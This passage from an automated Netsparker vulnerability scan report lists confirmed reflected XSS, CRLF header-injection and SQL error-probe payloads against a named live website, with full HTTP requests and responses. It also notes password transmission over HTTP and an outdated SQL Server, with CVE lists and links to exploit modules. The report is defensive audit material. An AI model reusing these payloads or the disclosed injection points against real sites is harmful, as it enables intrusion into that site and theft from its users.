<script>alert(0x0001C4)</script>
Request
GET /site/gallery/highslide/highslide-full.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001C4)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:48 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 200
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/gallery/highslide/highslide-full.js'"--></style></script><script>netsparker(0x0001C4)</script><BR>script><BR>style><<script>netsparker(0x0001C4)
<.asp?id=script>
3.141. /about/search/default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055A)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/about/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..
Parameters
Parameter Type Value
q GET 3
URI-BASED Full URL '"--></style></script>
<script>alert(0x00055A)</script>
Request
GET /about/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00055A)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/about/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
87 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:23 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 184
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/search/default.asp'"--></style></script><script>netsparker(0x00055A)</script><BR>script><BR>style><<script>netsparker(0x00055A)<.asp?id=script>
3.142. /js/HebDate.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E5)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/HebDate.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000E5)</script>
Request
GET /js/HebDate.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E5)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:43:56 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/HebDate.js'"--></style></script><script>netsparker(0x0000E5)</script><BR>script><BR>style><<script>netsparker(0x0000E5)<.asp?id=script>
3.143. /pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045B)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045B)%3C/..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00045B)</script>
Request
GET /pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00045B)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:46 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 167
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/pitgam/'"--></style></script><script>netsparker(0x00045B)</script><BR>script><BR>style><<script>netsparker(0x00045B)<.asp?id=script>
88 / 146
3.144. /banner/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057B)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/banner/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057B)%3C/..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00057B)</script>
Request
GET /banner/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00057B)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:35 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 167
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/banner/'"--></style></script><script>netsparker(0x00057B)</script><BR>script><BR>style><<script>netsparker(0x00057B)<.asp?id=script>
3.145. /site/gallery/highslide/highslide.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000123)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/gallery/highslide/highslide.css'%22--%3E%3C/style%3E%3C/script%3E%3..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000123)</script>
Request
GET /site/gallery/highslide/highslide.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000123)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:21 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 196
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/gallery/highslide/highslide.css'"--></style></script><script>netsparker(0x000123)</script><BR>script><BR>style><<script>netsparker(0x000123)<.asp?
id=script>
3.146. /js/images/ CONFIRMED
http://www.shalomlaam.co.il/js/images/?'"--></style></script><script>alert(0x00040E)</script>
Parameters
Parameter Type Value
Query Based Query String '"--></style></script>
<script>alert(0x00040E)</script>
89 / 146
Request
GET /js/images/?'"--></style></script><script>netsparker(0x00040E)</script> HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:56 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 171
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/images/?'"--></style></script><script>netsparker(0x00040E)</script><BR>script><BR>style><<script>netsparker(0x00040E)<.asp?id=script>
3.147. /reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B9)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B9)%3C/scr..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001B9)</script>
Request
GET /reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B9)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:30 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 164
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/reg/'"--></style></script><script>netsparker(0x0001B9)</script><BR>script><BR>style><<script>netsparker(0x0001B9)<.asp?id=script>
3.148. /site/ask/answer.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000302)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..
Parameters
Parameter Type Value
id GET 207
URI-BASED Full URL '"--></style></script>
<script>alert(0x000302)</script>
Request
GET /site/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000302)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
90 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:57:21 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 179
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/ask/answer.asp'"--></style></script><script>netsparker(0x000302)</script><BR>script><BR>style><<script>netsparker(0x000302)<.asp?id=script>
3.149. /site/ask/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000298)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000298)%3..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000298)</script>
Request
GET /site/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000298)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/ask/'"--></style></script><script>netsparker(0x000298)</script><BR>script><BR>style><<script>netsparker(0x000298)<.asp?id=script>
3.150. /site/reg/login.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000283)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/reg/login.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000283)</script>
Request
GET /site/reg/login.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000283)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:55:58 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/reg/login.asp'"--></style></script><script>netsparker(0x000283)</script><BR>script><BR>style><<script>netsparker(0x000283)<.asp?id=script>
91 / 146
1 TOTAL
IMPORTANT
CONFIRMED
1
4. Password Transmitted Over HTTP
Netsparker identified that password data is sent over HTTP. {PRODUCT} detected that password data is being transmitted over HTTP.
Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user
input, starting from the login process, should only be served over HTTPS.
Classification
OWASP A9 PCI v1.2-6.5.9 PCI v2.0-6.5.4 CWE-319 CAPEC-65 WASC-04
4.1. /reg/login.asp CONFIRMED
http://www.shalomlaam.co.il/reg/login.asp?id=0
Form target action
mshtml.HTMLInputElementClass
Request
GET /reg/login.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/reg/login.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:37 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 33739
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META http-equiv="Content-Type" content="text/html; charset=windows-1255">
<link rel="shortcut icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<link rel="icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<meta property="app_id" content="d87442e00d37a7959d0d216f101e0ea0">
<meta property="admins" content="1162579212">
<title> - </title>
<meta name="Author" CONTENT="shalomlaam.co.il">
<meta name="Keywords"
content=',,,,,,,,,,,,,,,,,,,,,,,,,,'>
<meta name="Description" CONTENT=", , , ' '. . ' '
: , ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Scripts/swfobject_modified.js" type="text/javascript"></script>-->
<script language="javascript" src="/js/HebDate.js"></script>
<script type="text/javascript">
<!--
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i]

92 / 146
1 TOTAL
IMPORTANT
5. MS SQL Version Is Out Of Date
Netsparker identified that the target web site is using Microsoft SQL Server as its backend database and detected that it is out of
date.
{PRODUCT} identified you are using an out-of-date version of Microsoft SQL.
Impact
Since this is an old version of the software, it may be vulnerable to attacks.
Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Known Vulnerabilities in this Version
GDI+ PNG Heap Overflow Vulnerability
Heap-based buffer overflow in GDI+ in SQL Server 2005 allows remote attackers to execute arbitrary code via a crafted PNG image file.
External References
CVE-2009-2501
GDI+ TIFF Buffer Overflow Vulnerability
Buffer overflow in GDI+ in SQL Server 2005 allows remote attackers to execute arbitrary code via a crafted TIFF image file.
External References
CVE-2009-2502
GDI+ TIFF Memory Corruption Vulnerability
GDI+ in SQL Server 2005 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image
file that triggers memory corruption.
External References
CVE-2009-2503
GDI+ .NET API Vulnerability
Multiple integer overflows in unspecified APIs in GDI+ in SQL Server 2005 allow remote attackers to execute arbitrary code via a crafted XAML browser
application (XBAP), a crafted ASP.NET application, or a crafted .NET Framework application.
External References
CVE-2009-2504
GDI+ PNG Integer Overflow Vulnerability
Integer overflow in GDI+ in SQL Server 2005 allows remote attackers to execute arbitrary code via a crafted PNG image file.
External References
CVE-2009-3126
Microsoft SQL Server 2005 Memory Page Reuse Information Disclosure Vulnerability
Microsoft SQL Server 2005 does not initialize memory pages when reallocating memory, which allows database operators to obtain sensitive information
(database contents) via unknown vectors related to memory page reuse.
External References
CVE-2008-0085
93 / 146
Microsoft SQL Server 2005 Memory Corruption Vulnerability
Integer underflow in SQL Server allows remote authenticated users to execute arbitrary code via a SMB or WebDAV pathname for an on-disk file (aka stored
backup file) with a crafted record size value, which triggers a heap-based buffer overflow.
External References
CVE-2008-0107
Microsoft SQL Server 2005 sp_replwritetovarbin Limited Memory Overwrite Vulnerability
Heap-based buffer overflow in Microsoft SQL Server allows remote authenticated users to cause a denial of service (access violation exception) or execute
arbitrary code by calling the sp_replwritetovarbin extended stored procedure with a set of invalid parameters that trigger memory overwrite.
External References
CVE-2008-5416
Exploit
http://www.securityfocus.com/bid/32710/exploit, http://www.metasploit.com/modules/exploit/windows/mssql/ms09_004_sp_replwritetovarbin,
http://www.metasploit.com/modules/exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli
Microsoft SQL Server 2005 Buffer Overrun Vulnerability
Buffer overflow in Microsoft SQL Server 2005, allows remote authenticated users to execute arbitrary code via a crafted insert statement.
External References
CVE-2008-0106
GDI+ WMF Integer Overflow Vulnerability
Integer overflow in GDI+ in SQL Server 2005 allows remote attackers to execute arbitrary code via a crafted WMF image file.
External References
CVE-2009-2500
GDI+ VML Buffer Overrun Vulnerability
Integer overflow in GDI+ in SQL Server 2005 allows remote attackers to execute arbitrary code via an image file with crafted gradient sizes in gradient fill
input, which triggers a heap-based buffer overflow related to GdiPlus.dll and VGX.DLL.
External References
CVE-2007-5348
Exploit
http://www.securityfocus.com/bid/31018/exploit
GDI+ EMF Memory Corruption Vulnerability
GDI+ in SQL Server 2005 does not properly perform memory allocation, which allows remote attackers to execute arbitrary code via a malformed EMF image
file.
External References
CVE-2008-3012
GDI+ GIF Parsing Vulnerability
gdiplus.dll in SQL Server 2005 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for
graphic control extensions and subsequent unknown labels.
External References
CVE-2008-3013
Exploit
94 / 146
http://www.securityfocus.com/bid/31020/exploit
GDI+ WMF Buffer Overrun Vulnerability
Buffer overflow in SQL Server 2005 allows remote attackers to execute arbitrary code via a malformed WMF image file that triggers improper memory
allocation.
External References
CVE-2008-3014
GDI+ BMP Integer Overflow Vulnerability
Integer overflow in gdiplus.dll in SQL Server 2005 allows remote attackers to execute arbitrary code via a BMP image file with a malformed BitMapInfoHeader
that triggers a buffer overflow.
External References
CVE-2008-3015
Classification
PCI v1.2-6.1 CAPEC-310
5.1. /contact/
http://www.shalomlaam.co.il/contact/
Version
9.00.3042.00
Certainty
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 258
Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=convert(int,
(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&phone=3&sendFrom=3&subject=3
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 14:05:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13813
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META http-equiv="Content-Type" content="text/html; charset=windows-1255">
<link rel="shortcut icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<link rel="icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<meta property="app_id" content="d87442e00d37a7959d0d216f101e0ea0">
<meta property="admins" content="1162579212">
<title> - </title>
<meta name="Author" CONTENT="shalomlaam.co.il">
<meta name="Keywords"
content=',,,,,,,,,,,,,,,,,,,,,,,,,,'>
<meta name="Description" CONTENT=", , , ' '. . ' '
: , ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Scripts/swfobject_modified.js" type="text/javascript"></script>-->
<script language="javascript" src="/js/HebDate.js"></script>
<script type="text/javascript">
<!--
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&

95 / 146
6 TOTAL
MEDIUM
6. HTTP Header Injection
A CRLF (New line) injection in HTTP headers was identified. This means that the input goes into HTTP headers without proper input
filtering.
{PRODUCT} identified a CRLF (new line) HTTP header injection.
This means the input goes into HTTP headers without proper input filtering.
Impact
Depending on the application, an attacker might carry out the following types of attacks:
Cross-site scripting attack, which can lead to session hijacking
Session fixation attack by setting a new cookie, which can also lead to session hijacking
Actions to Take
1. See the remedy for solution.
2. Ensure the server security patches are up to date and that the current stable version of the software is in use.
Remedy
Do not allow newline characters in input. Where possible, use strict whitelisting.
Required Skills for Successful Exploitation
Crafting the attack to exploit this issue is not a complex process. However, most unsophisticated attackers will not know that such an attack is possible. Also,
an attacker needs to reach his victim by e-mail or other similar method in order to entice them to visit the site or click on a URL.
External References
WASC - HTTP Response Splitting
OWASP - HTTP Response Splitting
OWASP - HTTP Response Splitting and Smuggling
Classification
OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.7 CWE-93 CAPEC-105 WASC-24
6.1. /site/ask/answer.asp
http://www.shalomlaam.co.il/site/ask/answer.asp?id=%0d%0ans%3anetsparker056650%3dvuln
Parameters
Parameter Type Value
id GET ns:netsparker056650=vuln
Certainty
Request
GET /site/ask/answer.asp?id=%0d%0ans%3anetsparker056650%3dvuln HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 301 Moved Permanently
Date: Tue, 20 May 2014 13:56:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.shalomlaam.co.il/ask/answer.asp?id=
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
96 / 146
6.2. /site/pitgam/
http://www.shalomlaam.co.il/site/pitgam/?CatID=%0d%0ans%3anetsparker056650%3dvuln
Parameters
Parameter Type Value
CatID GET ns:netsparker056650=vuln
Certainty
Request
GET /site/pitgam/?CatID=%0d%0ans%3anetsparker056650%3dvuln HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 301 Moved Permanently
Date: Tue, 20 May 2014 13:56:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.shalomlaam.co.il/pitgam/Default.asp?id=0&CatID=
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
